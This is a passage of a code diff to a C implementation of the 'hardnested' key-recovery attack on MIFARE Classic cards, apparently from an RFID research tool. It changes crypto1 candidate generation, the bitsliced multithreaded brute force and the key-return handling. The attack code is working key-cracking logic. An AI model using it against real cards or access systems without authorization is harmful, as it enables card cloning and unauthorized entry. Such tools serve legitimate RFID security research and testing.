-	printf("Key NOT found!\n");
-	if (write_stats) {
-		fprintf(fstats, "0\n");
+	if (known_target_key != -1) {
+		printf("Key NOT found!\n");
+		if (write_stats)
+			fprintf(fstats, "0\n");
 	}
 	crypto1_destroy(pcs);
+	return false;
 }
 
-static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
+static bool generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 {
 	printf("Generating crypto1 state candidates... \n");
 	
@@ -1285,30 +1308,34 @@ static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 			}
 		}
 	}
-	printf("Number of possible keys with Sum(a0) = %d: %"PRIu64" (2^%1.1f)\n", sum_a0, maximum_states, log(maximum_states)/log(2.0));
+
+	if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	printf("Number of possible keys with Sum(a0) = %d: %"PRIu64" (2^%1.1f)\n", sum_a0, maximum_states, log(maximum_states)/log(2));
 	
 	init_statelist_cache();
 	
 	for (uint16_t p = 0; p <= 16; p += 2) {
 		for (uint16_t q = 0; q <= 16; q += 2) {
 			if (p*(16-q) + (16-p)*q == sum_a0) {
-				printf("Reducing Partial Statelists (p,q) = (%d,%d) with lengths %d, %d\n", 
-						p, q, partial_statelist[p].len[ODD_STATE], partial_statelist[q].len[EVEN_STATE]);
+				// printf("Reducing Partial Statelists (p,q) = (%d,%d) with lengths %d, %d\n", 
+						// p, q, partial_statelist[p].len[ODD_STATE], partial_statelist[q].len[EVEN_STATE]);
 				for (uint16_t r = 0; r <= 16; r += 2) {
 					for (uint16_t s = 0; s <= 16; s += 2) {
 						if (r*(16-s) + (16-r)*s == sum_a8) {
 							current_candidates = add_more_candidates(current_candidates);
+							if (current_candidates != NULL) {
 							// check for the smallest partial statelist. Try this first - it might give 0 candidates 
 							// and eliminate the need to calculate the other part
 							if (MIN(partial_statelist[p].len[ODD_STATE], partial_statelist[r].len[ODD_STATE]) 
 									< MIN(partial_statelist[q].len[EVEN_STATE], partial_statelist[s].len[EVEN_STATE])) { 
-							add_matching_states(current_candidates, p, r, ODD_STATE);
+								add_matching_states(current_candidates, p, r, ODD_STATE);
 								if(current_candidates->len[ODD_STATE]) {
-							add_matching_states(current_candidates, q, s, EVEN_STATE);
+									add_matching_states(current_candidates, q, s, EVEN_STATE);
 								} else {
 									current_candidates->len[EVEN_STATE] = 0;
 									uint32_t *p = current_candidates->states[EVEN_STATE] = malloc(sizeof(uint32_t));
-									*p = 0xffffffff;
+									*p = END_OF_LIST_MARKER;
 								}
 							} else {
 								add_matching_states(current_candidates, q, s, EVEN_STATE);
@@ -1317,34 +1344,38 @@ static void generate_candidates(uint16_t sum_a0, uint16_t sum_a8)
 								} else {
 									current_candidates->len[ODD_STATE] = 0;
 									uint32_t *p = current_candidates->states[ODD_STATE] = malloc(sizeof(uint32_t));
-									*p = 0xffffffff;
+									*p = END_OF_LIST_MARKER;
 								}
 							}
-							printf("Odd  state candidates: %6d (2^%0.1f)\n", current_candidates->len[ODD_STATE], log(current_candidates->len[ODD_STATE])/log(2)); 
-							printf("Even state candidates: %6d (2^%0.1f)\n", current_candidates->len[EVEN_STATE], log(current_candidates->len[EVEN_STATE])/log(2)); 
+							//printf("Odd  state candidates: %6d (2^%0.1f)\n", current_candidates->len[ODD_STATE], log(current_candidates->len[ODD_STATE])/log(2)); 
+							//printf("Even state candidates: %6d (2^%0.1f)\n", current_candidates->len[EVEN_STATE], log(current_candidates->len[EVEN_STATE])/log(2)); 
 						}
 					}
 				}
 			}
 		}
 	}					
+	}					
 
-	
 	maximum_states = 0;
-	for (statelist_t *sl = candidates; sl != NULL; sl = sl->next) {
+	unsigned int n = 0;
+	for (statelist_t *sl = candidates; sl != NULL && n < MAX_BUCKETS; sl = sl->next, n++) {
 		maximum_states += (uint64_t)sl->len[ODD_STATE] * sl->len[EVEN_STATE];
 	}
-	printf("Number of remaining possible keys: %"PRIu64" (2^%1.1f)\n", maximum_states, log(maximum_states)/log(2.0));
+
+	if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	float kcalc = log(maximum_states)/log(2);
+	printf("Number of remaining possible keys: %"PRIu64" (2^%1.1f)\n", maximum_states, kcalc);
 	if (write_stats) {
-		if (maximum_states != 0) {
-			fprintf(fstats, "%1.1f;", log(maximum_states)/log(2.0));
-		} else {
-			fprintf(fstats, "%1.1f;", 0.0);
-		}
+		fprintf(fstats, "%1.1f;", (kcalc != 0) ? kcalc : 0.0);
 	}
+	if (kcalc < CRACKING_THRESHOLD) return true;
+
+	return false;
 }
 
-static void	free_candidates_memory(statelist_t *sl)
+static void free_candidates_memory(statelist_t *sl)
 {
 	if (sl == NULL) {
 		return;
@@ -1365,21 +1396,6 @@ static void free_statelist_cache(void)
 	}		
 }
 
-size_t keys_found = 0;
-size_t bucket_count = 0;
-statelist_t* buckets[128];
-size_t total_states_tested = 0;
-size_t thread_count = 4;
-
-// these bitsliced states will hold identical states in all slices
-bitslice_t bitsliced_rollback_byte[ROLLBACK_SIZE];
-
-// arrays of bitsliced states with identical values in all slices
-bitslice_t bitsliced_encrypted_nonces[NONCE_TESTS][STATE_SIZE];
-bitslice_t bitsliced_encrypted_parity_bits[NONCE_TESTS][ROLLBACK_SIZE];
-
-#define EXACT_COUNT
-
 static const uint64_t crack_states_bitsliced(statelist_t *p){
     // the idea to roll back the half-states before combining them was suggested/explained to me by bla
     // first we pre-bitslice all the even state bits and roll them back, then bitslice the odd bits and combine the two in the inner loop
@@ -1407,7 +1423,11 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
 		bitslice_t * restrict lstate_p = _aligned_malloc((STATE_SIZE+ROLLBACK_SIZE) * bSize, bSize);
 	#endif
 #else
+	#ifdef __APPLE__
+		bitslice_t * restrict lstate_p = malloc((STATE_SIZE+ROLLBACK_SIZE) * bSize);
+	#else
 		bitslice_t * restrict lstate_p = memalign(bSize, (STATE_SIZE+ROLLBACK_SIZE) * bSize);
+	#endif
 #endif
 
 		if ( !lstate_p )	{
@@ -1464,16 +1484,12 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
         crypto1_bs_rewind_a0();
         // set odd bits
         for(size_t state_idx = 0; state_idx < STATE_SIZE-ROLLBACK_SIZE; o >>= 1, state_idx+=2){
-            if(o & 1){
-                state_p[state_idx] = bs_ones;
-            } else {
-                state_p[state_idx] = bs_zeroes;
-            }
+            state_p[state_idx] = (o & 1) ? bs_ones : bs_zeroes;
         }
         const bitslice_value_t odd_feedback = odd_feedback_bit ? bs_ones.value : bs_zeroes.value;
 
         for(size_t block_idx = 0; block_idx < bitsliced_blocks; ++block_idx){
-            const bitslice_t const * restrict bitsliced_even_state = bitsliced_even_states[block_idx];
+            const bitslice_t * const restrict bitsliced_even_state = bitsliced_even_states[block_idx];
             size_t state_idx;
             // set even bits
             for(state_idx = 0; state_idx < STATE_SIZE-ROLLBACK_SIZE; state_idx+=2){
@@ -1498,7 +1514,7 @@ static const uint64_t crack_states_bitsliced(statelist_t *p){
             }
 
 #ifdef EXACT_COUNT
-            bucket_states_tested += bucket_size[block_idx];
+            bucket_states_tested += (bucket_size[block_idx] > MAX_BITSLICES) ? MAX_BITSLICES : bucket_size[block_idx];
 #endif
             // pre-compute first keystream and feedback bit vectors
             const bitslice_value_t ksb = crypto1_bs_f20(state_p);
@@ -1598,7 +1614,7 @@ out:
 		_aligned_free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);		
 	#endif
 #else
-		memfree(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
+		free(bitsliced_even_states[block_idx]-ROLLBACK_SIZE);
 #endif		
 		
     }
@@ -1609,16 +1625,25 @@ out:
 static void* crack_states_thread(void* x){
     const size_t thread_id = (size_t)x;
     size_t current_bucket = thread_id;
+	statelist_t *bucket = NULL;
+
     while(current_bucket < bucket_count){
-        statelist_t * bucket = buckets[current_bucket];
-		if(bucket){
+		if (keys_found) break;
+
+		if ((bucket = buckets[current_bucket])) {
             const uint64_t key = crack_states_bitsliced(bucket);
-            if(key != -1){
-                printf("\nFound key: %012"PRIx64"\n", key);
+
+			if (keys_found) break;
+			else if(key != -1) {
+				if (TestIfKeyExists(key)) {
                 __sync_fetch_and_add(&keys_found, 1);
+				__sync_fetch_and_add(&foundkey, key);
+					printf("*");
+					fflush(stdout);
                 break;
-            } else if(keys_found){
-                break;
+				}
+				printf("!");
+				fflush(stdout);
             } else {				
                 printf(".");
 				fflush(stdout);
@@ -1628,75 +1653,90 @@ static void* crack_states_thread(void* x){
     }
     return NULL;
 }
-#define _USE_32BIT_TIME_T
-static void brute_force(void)
-{
+
+static bool brute_force(void) {
+	bool ret = false;
 	if (known_target_key != -1) {
 		PrintAndLog("Looking for known target key in remaining key space...");
-		TestIfKeyExists(known_target_key);
+		ret = TestIfKeyExists(known_target_key);
 	} else {
-        PrintAndLog("Brute force phase starting.");
-        time_t start, end;
-        time(&start);
-        keys_found = 0;
-
-        crypto1_bs_init();
-
-        PrintAndLog("Using %u-bit bitslices", MAX_BITSLICES);
-        PrintAndLog("Bitslicing best_first_byte^uid[3] (rollback byte): %02x...", best_first_bytes[0]^(cuid>>24));
-        // convert to 32 bit little-endian
-        crypto1_bs_bitslice_value32(rev32((best_first_bytes[0]^(cuid>>24))), bitsliced_rollback_byte, 8);
-
-        PrintAndLog("Bitslicing nonces...");
-        for(size_t tests = 0; tests < NONCE_TESTS; tests++){
-            uint32_t test_nonce = brute_force_nonces[tests]->nonce_enc;
-            uint8_t test_parity = brute_force_nonces[tests]->par_enc;
-            // pre-xor the uid into the decrypted nonces, and also pre-xor the cuid parity into the encrypted parity bits - otherwise an exta xor is required in the decryption routine
-            crypto1_bs_bitslice_value32(cuid^test_nonce, bitsliced_encrypted_nonces[tests], 32);
-            // convert to 32 bit little-endian
-            crypto1_bs_bitslice_value32(rev32( ~(test_parity ^ ~(parity(cuid>>24 & 0xff)<<3 | parity(cuid>>16 & 0xff)<<2 | parity(cuid>>8 & 0xff)<<1 | parity(cuid&0xff)))), bitsliced_encrypted_parity_bits[tests], 4);
-        }
-        total_states_tested = 0;
-
-        // count number of states to go
-        bucket_count = 0;
-        for (statelist_t *p = candidates; p != NULL; p = p->next) {
-            buckets[bucket_count] = p;
-            bucket_count++;
-        }
+		if (maximum_states == 0) return false; // prevent keyspace reduction error (2^-inf)
+
+	 	PrintAndLog("Brute force phase starting.");
+
+		clock_t time1 = clock();	 	
+		keys_found = 0;
+		foundkey = 0;
+
+		crypto1_bs_init();
+		memset (bitsliced_rollback_byte, 0, sizeof (bitsliced_rollback_byte));
+		memset (bitsliced_encrypted_nonces, 0, sizeof (bitsliced_encrypted_nonces));
+		memset (bitsliced_encrypted_parity_bits, 0, sizeof (bitsliced_encrypted_parity_bits));
+
+		PrintAndLog("Using %u-bit bitslices", MAX_BITSLICES);
+		PrintAndLog("Bitslicing best_first_byte^uid[3] (rollback byte): %02X ...", best_first_bytes[0]^(cuid>>24));
+		// convert to 32 bit little-endian
+		crypto1_bs_bitslice_value32((best_first_bytes[0]<<24)^cuid, bitsliced_rollback_byte, 8);
+
+		PrintAndLog("Bitslicing nonces...");
+		for(size_t tests = 0; tests < NONCE_TESTS; tests++){
+			uint32_t test_nonce = brute_force_nonces[tests]->nonce_enc;
+			uint8_t test_parity = brute_force_nonces[tests]->par_enc;
+			// pre-xor the uid into the decrypted nonces, and also pre-xor the cuid parity into the encrypted parity bits - otherwise an exta xor is required in the decryption routine
+			crypto1_bs_bitslice_value32(cuid^test_nonce, bitsliced_encrypted_nonces[tests], 32);
+			// convert to 32 bit little-endian
+			crypto1_bs_bitslice_value32(rev32( ~(test_parity ^ ~(parity(cuid>>24 & 0xff)<<3 | parity(cuid>>16 & 0xff)<<2 | parity(cuid>>8 & 0xff)<<1 | parity(cuid&0xff)))), bitsliced_encrypted_parity_bits[tests], 4);
+		}
+		total_states_tested = 0;
+
+		// count number of states to go
+		bucket_count = 0;
+		buckets[MAX_BUCKETS-1] = NULL;
+		for (statelist_t *p = candidates; p != NULL && bucket_count < MAX_BUCKETS; p = p->next) {
+			buckets[bucket_count] = p;
+			bucket_count++;
+		}
+		if (bucket_count < MAX_BUCKETS) buckets[bucket_count] = NULL;
 
 #ifndef __WIN32
-        thread_count = sysconf(_SC_NPROCESSORS_CONF);
+		thread_count = sysconf(_SC_NPROCESSORS_CONF);
+		if ( thread_count < 1)
+			thread_count = 1;
 #endif  /* _WIN32 */
-        pthread_t threads[thread_count];
-		
-        // enumerate states using all hardware threads, each thread handles one bucket
-        PrintAndLog("Starting %u cracking threads to search %u buckets containing a total of %"PRIu32" states...", thread_count, bucket_count, maximum_states);
-		
-        for(size_t i = 0; i < thread_count; i++){
-            pthread_create(&threads[i], NULL, crack_states_thread, (void*) i);
-        }
-        for(size_t i = 0; i < thread_count; i++){
-            pthread_join(threads[i], 0);
-        }
 
-        time(&end);
-        unsigned long elapsed_time = difftime(end, start);
-        PrintAndLog("Tested %"PRIu32" states, found %u keys after %u seconds", total_states_tested, keys_found, elapsed_time);
-        if(!keys_found){
-            assert(total_states_tested == maximum_states);
-        }
-        // reset this counter for the next call
-        nonces_to_bruteforce = 0;
+		pthread_t threads[thread_count];
+
+		// enumerate states using all hardware threads, each thread handles one bucket
+		PrintAndLog("Starting %u cracking threads to search %u buckets containing a total of %"PRIu64" states...", thread_count, bucket_count, maximum_states);
+
+		for(size_t i = 0; i < thread_count; i++){
+			pthread_create(&threads[i], NULL, crack_states_thread, (void*) i);
+		}
+		for(size_t i = 0; i < thread_count; i++){
+			pthread_join(threads[i], 0);
+		}
+
+		time1 = clock() - time1;
+		PrintAndLog("\nTime for bruteforce %0.1f seconds.",((float)time1)/CLOCKS_PER_SEC);		
+		
+		if (keys_found) {
+			PrintAndLog("\nFound key: %012"PRIx64"\n", foundkey);
+			ret = true;
+		} 
+		// reset this counter for the next call
+		nonces_to_bruteforce = 0;
 	}
+	return ret;
 }
 
-int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, uint8_t *trgkey, bool nonce_file_read, bool nonce_file_write, bool slow, int tests) 
+int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, uint8_t *trgkey, bool nonce_file_read, bool nonce_file_write, bool slow, int tests, uint64_t *found_key) 
 {
 	// initialize Random number generator
 	time_t t;
 	srand((unsigned) time(&t));
 	
+	*found_key = 0;
+	
 	if (trgkey != NULL) {
 		known_target_key = bytes_to_num(trgkey, 6);
 	} else {
@@ -1729,51 +1769,39 @@ int mfnestedhard(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBloc
 			candidates = NULL;
 		}
 		fclose(fstats);
+		fstats = NULL;
 	} else {
 		init_nonce_memory();
-		if (nonce_file_read) {  	// use pre-acquired data from file nonces.bin
+		if (nonce_file_read) { // use pre-acquired data from file nonces.bin
 			if (read_nonce_file() != 0) {
 				return 3;
 			}
 			Check_for_FilterFlipProperties();
 			num_good_first_bytes = MIN(estimate_second_byte_sum(), GOOD_BYTES_REQUIRED);
-		} else {					// acquire nonces.
+			PrintAndLog("Number of first bytes with confidence > %2.1f%%: %d", CONFIDENCE_THRESHOLD*100.0, num_good_first_bytes);
+
+			bool cracking = generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess);
+			if (cracking || known_target_key != -1) {
+				brute_force();
+			}
+
+		} else { // acquire nonces.
 			uint16_t is_OK = acquire_nonces(blockNo, keyType, key, trgBlockNo, trgKeyType, nonce_file_write, slow);
 			if (is_OK != 0) {
+				free_nonces_memory();
+				//free_statelist_cache();
+				free_candidates_memory(candidates);
+				candidates = NULL;
 				return is_OK;
 			}
 		}
 
-		Tests();
-
-		PrintAndLog("");
-		PrintAndLog("Sum(a0) = %d", first_byte_Sum);
-		// PrintAndLog("Best 10 first bytes: %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x, %02x",
-			// best_first_bytes[0],
-			// best_first_bytes[1],
-			// best_first_bytes[2],
-			// best_first_bytes[3],
-			// best_first_bytes[4],
-			// best_first_bytes[5],
-			// best_first_bytes[6],
-			// best_first_bytes[7],
-			// best_first_bytes[8],
-			// best_first_bytes[9]  );
-		PrintAndLog("Number of first bytes with confidence > %2.1f%%: %d", CONFIDENCE_THRESHOLD*100.0, num_good_first_bytes);
-
-		clock_t time1 = clock();
-		generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess);
-		time1 = clock() - time1;
-		if ( time1 > 0 )
-			PrintAndLog("Time for generating key candidates list: %1.0f seconds", ((float)time1)/CLOCKS_PER_SEC);
-	
-		brute_force();
+		//Tests();
 		free_nonces_memory();
 		free_statelist_cache();
 		free_candidates_memory(candidates);
 		candidates = NULL;
-	}	
+	}
+	*found_key = foundkey;
 	return 0;
-}
-
-
+}
\ No newline at end of file